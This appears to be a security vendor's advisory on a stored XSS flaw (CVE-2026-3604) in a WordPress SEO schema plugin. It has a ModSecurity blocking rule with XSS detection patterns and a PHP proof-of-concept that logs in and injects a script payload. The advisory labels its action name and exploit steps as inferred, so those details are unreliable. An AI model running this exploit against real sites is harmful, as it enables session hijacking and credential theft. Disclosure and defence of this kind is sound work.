Atomic Edge analysis of CVE-2026-3604 (metadata-based): This vulnerability allows authenticated attackers with Contributor-level access or higher to inject stored cross-site scripting payloads through the `_kcseo_ative_tab` parameter in the WP SEO Structured Data Schema plugin versions up to 2.8.1. The CVSS score of 4.9 reflects the high attack complexity but low privileges required, with a scope change indicating the injected script affects other users.
Root Cause: The vulnerability stems from insufficient input sanitization and output escaping on the `_kcseo_ative_tab` parameter when it is stored and later rendered in admin pages. Atomic Edge research infers this is a stored XSS (CWE-79) pattern common in WordPress plugins where user-controllable input is saved to the database via AJAX handlers or form submissions and displayed without proper escaping. The plugin likely uses an `add_action` hook for `wp_ajax_*` to save a tab selection or similar UI state without sanitizing the value.
Exploitation: An attacker with Contributor-level access can craft a POST request to `/wp-admin/admin-ajax.php` with the action parameter likely set to something like `kcseo_save_ative_tab` (following the plugin naming convention from the parameter prefix), a valid nonce, and a payload in `_kcseo_ative_tab` containing JavaScript. Atomic Edge analysis suggests the payload could be something like `alert(document.cookie)` or more sophisticated XSS vectors. The stored payload triggers when any user, including administrators, accesses the affected admin page that renders this value.
Remediation: The fix must escape the `_kcseo_ative_tab` parameter before output. The plugin should apply WordPress’s `esc_js()` or `esc_html()` functions when rendering the stored value, and pass the input through `sanitize_text_field()` or other appropriate sanitization functions before saving. Since no patched version exists, users should remove or replace the plugin.
Impact: Successful exploitation allows arbitrary script execution in the browser of any user who views the affected page. This can lead to session hijacking, credential theft, defacement, or redirection to malicious sites. The scope change in the CVSS vector confirms the injected script impacts resources beyond the vulnerable component, such as the entire admin dashboard.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-3604 (metadata-based)
# Blocks malicious _kcseo_ative_tab parameter in the AJAX action
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:20263604,phase:2,deny,status:403,chain,msg:'CVE-2026-3604 - Stored XSS via _kcseo_ative_tab',severity:'CRITICAL',tag:'CVE-2026-3604'"
SecRule ARGS_POST:action "@streq kcseo_save_ative_tab" "chain"
SecRule ARGS_POST:_kcseo_ative_tab "@rx <script|<img|onerror|onload|javascript:" "t:none"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-3604 - WP SEO Structured Data Schema <= 2.8.1 - Stored XSS
<?php
// Configuration: Set these variables before running
$target_url = 'http://example.com'; // WordPress site URL
$username = 'contributor'; // Valid WordPress contributor account
$password = 'password'; // Password for the account
// Step 1: Authenticate and get cookies
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'log=' . urlencode($username) . '&pwd=' . urlencode($password) . '&wp-submit=Log+In');
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
// Assume login succeeded if no error
// Step 2: Get the nonce for AJAX action (assumed from plugin naming)
// This step may require parsing the admin page for the nonce value
// For demonstration, we assume nonce is obtained via a separate request
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin.php?page=kcseo-settings');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$admin_page = curl_exec($ch);
preg_match('/data-nonce="([a-f0-9]+)"|nonce"[^>]*value="([a-f0-9]+)"/', $admin_page, $matches);
$nonce = isset($matches[1]) ? $matches[1] : (isset($matches[2]) ? $matches[2] : '');
if (empty($nonce)) {
die('Could not extract nonce. Manual inspection of admin page may be required.');
}
// Step 3: Inject XSS payload via AJAX
$payload = '<script>alert("XSS")</script>';
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
'action' => 'kcseo_save_ative_tab', // Inferred action name
'_kcseo_ative_tab' => $payload,
'_ajax_nonce' => $nonce,
)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$ajax_response = curl_exec($ch);
if (curl_error($ch)) {
die('cURL error: ' . curl_error($ch));
}
echo "XSS payload sent. Payload: $payloadn";
echo "AJAX response: $ajax_responsen";
curl_close($ch);
?>
